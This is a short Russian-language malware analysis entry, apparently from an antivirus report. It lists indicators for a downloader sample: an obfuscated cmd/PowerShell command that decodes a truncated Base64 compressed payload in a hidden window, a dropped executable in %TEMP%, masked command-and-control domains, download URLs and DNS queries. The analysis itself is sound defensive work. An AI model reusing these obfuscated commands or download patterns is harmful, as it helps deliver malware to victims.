Техническая информация
- '<SYSTEM32>\cmd.exe' <SYSTEM32>\CmD /C "sET djCFB= ( New-ObJecT sysTEm.io.comPREssIoN.dEfLATEStREaM( [iO.MemOrYSTReAm][COnVErt]::fromBASe64STRInG('NZBda8IwFED/Sh8CUZzpw9SpoaDo3MThx2QMx15qvFvSpklJUmMV//tama/3nHv...
- %TEMP%\654.exe
- 'hu##eler.ru':80
- 'hu##eler.ru':443
- 'ro#####curityinc.com':80
- http://www.hu##eler.ru/E4L4Aymxd
- http://ro#####curityinc.com/K87nKS9K
- 'hu##eler.ru':443
- DNS ASK st###nikms.ru
- DNS ASK hu##eler.ru
- DNS ASK su###pipe.ru
- DNS ASK hl###utters.nl
- DNS ASK ro#####curityinc.com
- '<SYSTEM32>\cmd.exe' <SYSTEM32>\CmD /C "sET djCFB= ( New-ObJecT sysTEm.io.comPREssIoN.dEfLATEStREaM( [iO.MemOrYSTReAm][COnVErt]::fromBASe64STRInG('NZBda8IwFED/Sh8CUZzpw9SpoaDo3MThx2QMx15qvFvSpklJUmMV//tama/3nHv...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ( & ( \"{1}{0}\"-f 'TeM','i') ( \"{0}{1}{2}\" -f 'ENv:dj','c','Fb' ) ).\"va`LUe\" | .(( & ( 'gv') (\"{0}{1}\" -f'*Md','r*' ) ).\"N`AMe\"[3,11,2]-joIn'' )